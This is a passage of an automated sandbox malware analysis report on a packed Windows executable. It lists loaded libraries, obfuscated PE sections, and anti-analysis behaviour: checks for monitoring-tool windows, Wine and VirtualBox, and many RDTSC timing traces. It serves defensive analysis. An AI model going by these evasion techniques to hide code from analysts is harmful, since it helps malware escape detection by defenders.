Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1798144 > 1048576
Source: file.exe | Static PE information: Raw size of enovjnaf is bigger than: 0x100000 < 0x19d200

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.510000.0.unpack :EW;.rsrc:W;.idata :W; :EW;enovjnaf:EW;oxoldoae:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;enovjnaf:EW;oxoldoae:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00536390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00536390
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c106b should be: 0x1c6889
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: enovjnaf
Source: file.exe | Static PE information: section name: oxoldoae
Source: file.exe | Static PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0090289C push eax; mov dword ptr [esp], ebp | 0_2_0090290E
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00959886 push ebx; mov dword ptr [esp], ecx | 0_2_009598DF
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00959886 push edx; mov dword ptr [esp], ebx | 0_2_00959946
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009468B8 push 2404F600h; mov dword ptr [esp], ecx | 0_2_00946873
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009468B8 push 2FE62BBAh; mov dword ptr [esp], ecx | 0_2_00946892
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009468B8 push eax; mov dword ptr [esp], 7FCCDDCFh | 0_2_009468D4
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009468B8 push 20CA5969h; mov dword ptr [esp], edx | 0_2_00946906
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009468B8 push esi; mov dword ptr [esp], ecx | 0_2_00946937
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009468B8 push 143AEFB3h; mov dword ptr [esp], esp | 0_2_00946972
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009468B8 push 66B6CC7Fh; mov dword ptr [esp], eax | 0_2_0094699E
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008FF8CC push 61AD98A5h; mov dword ptr [esp], esi | 0_2_008FF8F3
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008FF8CC push edx; mov dword ptr [esp], 061075B6h | 0_2_008FF907
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008FF8CC push eax; mov dword ptr [esp], ecx | 0_2_008FF927
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00970810 push eax; mov dword ptr [esp], edx | 0_2_0097085A
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083601D push 532D50CEh; mov dword ptr [esp], ecx | 0_2_00836095
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083601D push esi; mov dword ptr [esp], edx | 0_2_008360C6
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083601D push 503E0754h; mov dword ptr [esp], eax | 0_2_00836118
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083601D push 1FB9673Bh; mov dword ptr [esp], ebx | 0_2_008361CC
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0083601D push ebx; mov dword ptr [esp], eax | 0_2_0083620F
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008DC023 push eax; mov dword ptr [esp], ebp | 0_2_008DC033
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00537895 push ecx; ret | 0_2_005378A8
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F4055 push eax; mov dword ptr [esp], edx | 0_2_009F4081
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F4055 push 711618C3h; mov dword ptr [esp], ecx | 0_2_009F40BC
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F4055 push edi; mov dword ptr [esp], 37BB2BC3h | 0_2_009F4189
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009F4055 push esi; mov dword ptr [esp], 70120483h | 0_2_009F419F
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0080805B push edi; mov dword ptr [esp], esi | 0_2_00808099
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009BD18B push esi; mov dword ptr [esp], eax | 0_2_009BD19C
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099898F push edx; mov dword ptr [esp], 7FBF61A0h | 0_2_009989B3
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099898F push 7E81CA36h; mov dword ptr [esp], eax | 0_2_009989EA
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099898F push ebx; mov dword ptr [esp], ebp | 0_2_00998A2B
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099898F push edx; mov dword ptr [esp], 66786D3Ah | 0_2_00998A48
              Source: file.exe | Static PE information: section name: enovjnaf entropy: 7.954450679533088

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00536390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00536390

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-25960
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75FF4D second address: 75FF6C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007FD978BA9B16h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FD978BA9B20h 0x00000015 jmp 00007FD978BA9B1Ah 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75FF6C second address: 75FF87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD979248A87h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75F7B6 second address: 75F7BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C505E second address: 8C5064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DBE82 second address: 8DBE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DBE86 second address: 8DBEE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FD979248A7Ch 0x0000000f jmp 00007FD979248A7Eh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnc 00007FD979248A90h 0x0000001d push eax 0x0000001e push edx 0x0000001f ja 00007FD979248A76h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DBEE8 second address: 8DBEEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DBEEC second address: 8DBEF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DC314 second address: 8DC324 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD978BA9B22h 0x00000008 jp 00007FD978BA9B16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DC5E5 second address: 8DC5E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DC5E9 second address: 8DC5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF5FC second address: 8DF663 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FD979248A88h 0x0000000c pop ebx 0x0000000d popad 0x0000000e add dword ptr [esp], 40046420h 0x00000015 mov dword ptr [ebp+122D1BF7h], ebx 0x0000001b push esi 0x0000001c jnc 00007FD979248A7Ch 0x00000022 mov ecx, dword ptr [ebp+122D3659h] 0x00000028 pop edx 0x00000029 push 00000003h 0x0000002b mov dh, bl 0x0000002d push 00000000h 0x0000002f mov esi, dword ptr [ebp+122D18AAh] 0x00000035 push 00000003h 0x00000037 or dword ptr [ebp+122D2233h], ebx 0x0000003d call 00007FD979248A79h 0x00000042 push eax 0x00000043 push edx 0x00000044 jnl 00007FD979248A7Ch 0x0000004a ja 00007FD979248A76h 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF663 second address: 8DF6B6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD978BA9B18h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FD978BA9B2Ch 0x00000014 pop edx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a jng 00007FD978BA9B1Ch 0x00000020 pop eax 0x00000021 mov eax, dword ptr [eax] 0x00000023 jmp 00007FD978BA9B1Bh 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push esi 0x0000002d push eax 0x0000002e push edx 0x0000002f push edi 0x00000030 pop edi 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF6B6 second address: 8DF6DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pop eax 0x0000000b mov si, dx 0x0000000e lea ebx, dword ptr [ebp+12453502h] 0x00000014 xor dx, EC0Dh 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF6DE second address: 8DF6E3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF741 second address: 8DF745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF745 second address: 8DF84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007FD978BA9B28h 0x0000000f call 00007FD978BA9B26h 0x00000014 mov dword ptr [ebp+122D1803h], ecx 0x0000001a pop edi 0x0000001b pop edx 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D1991h], ecx 0x00000024 pushad 0x00000025 pushad 0x00000026 mov bx, 57F1h 0x0000002a mov ax, si 0x0000002d popad 0x0000002e mov dword ptr [ebp+122D2A11h], eax 0x00000034 popad 0x00000035 push 31A692D9h 0x0000003a jno 00007FD978BA9B29h 0x00000040 xor dword ptr [esp], 31A69259h 0x00000047 sub si, 5A29h 0x0000004c pushad 0x0000004d mov ebx, dword ptr [ebp+122D2233h] 0x00000053 mov dword ptr [ebp+122D1BA5h], edi 0x00000059 popad 0x0000005a push 00000003h 0x0000005c call 00007FD978BA9B29h 0x00000061 and ecx, dword ptr [ebp+122D35D5h] 0x00000067 pop edi 0x00000068 movzx esi, bx 0x0000006b push 00000000h 0x0000006d xor edi, 69B6DC56h 0x00000073 push 00000003h 0x00000075 jns 00007FD978BA9B2Bh 0x0000007b call 00007FD978BA9B19h 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 jmp 00007FD978BA9B28h 0x00000088 jbe 00007FD978BA9B16h 0x0000008e popad 0x0000008f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF84B second address: 8DF88C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD979248A83h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push edi 0x00000014 jno 00007FD979248A78h 0x0000001a pop edi 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f jbe 00007FD979248A7Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF88C second address: 8DF890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF890 second address: 8DF8BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD979248A80h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007FD979248A7Ch 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF8BA second address: 8DF8FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a sub dword ptr [ebp+122D1B7Ch], ebx 0x00000010 lea ebx, dword ptr [ebp+1245350Bh] 0x00000016 push eax 0x00000017 sub esi, dword ptr [ebp+122D3489h] 0x0000001d pop edi 0x0000001e mov dword ptr [ebp+122D18A4h], eax 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edx 0x00000029 pop edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF8FA second address: 8DF8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF8FF second address: 8DF920 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD978BA9B27h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF920 second address: 8DF924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DF924 second address: 8DF928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DFAC4 second address: 8DFACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8DFACB second address: 8DFAD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF137 second address: 8FF13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF13B second address: 8FF13F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF13F second address: 8FF15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD979248A81h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF15B second address: 8FF166 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF166 second address: 8FF16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF16C second address: 8FF171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF587 second address: 8FF58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF6E4 second address: 8FF6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF6EA second address: 8FF6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF6EE second address: 8FF6FA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD978BA9B16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF6FA second address: 8FF70A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD979248A76h 0x0000000a jbe 00007FD979248A76h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF70A second address: 8FF726 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FD978BA9B1Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FD978BA9B16h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF726 second address: 8FF72A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF72A second address: 8FF72E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF72E second address: 8FF734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF9C4 second address: 8FF9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF9C8 second address: 8FF9E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FD979248A76h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FF9E2 second address: 8FF9EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FFDC5 second address: 8FFDC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 900EDB second address: 900EF0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007FD978BA9B1Ah 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 904F62 second address: 904F7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 904F7F second address: 904FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jng 00007FD978BA9B28h 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007FD978BA9B16h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8CBD10 second address: 8CBD16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8CBD16 second address: 8CBD1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9079B8 second address: 9079BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9079BE second address: 9079D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD978BA9B22h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9079D5 second address: 9079E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FD979248A76h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8C6B64 second address: 8C6B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD978BA9B26h 0x0000000d jmp 00007FD978BA9B24h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90BDB4 second address: 90BDC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD979248A7Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90BDC4 second address: 90BDD3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD978BA9B16h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90C1AE second address: 90C1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90C578 second address: 90C596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jg 00007FD978BA9B16h 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 jne 00007FD978BA9B16h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90C596 second address: 90C5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
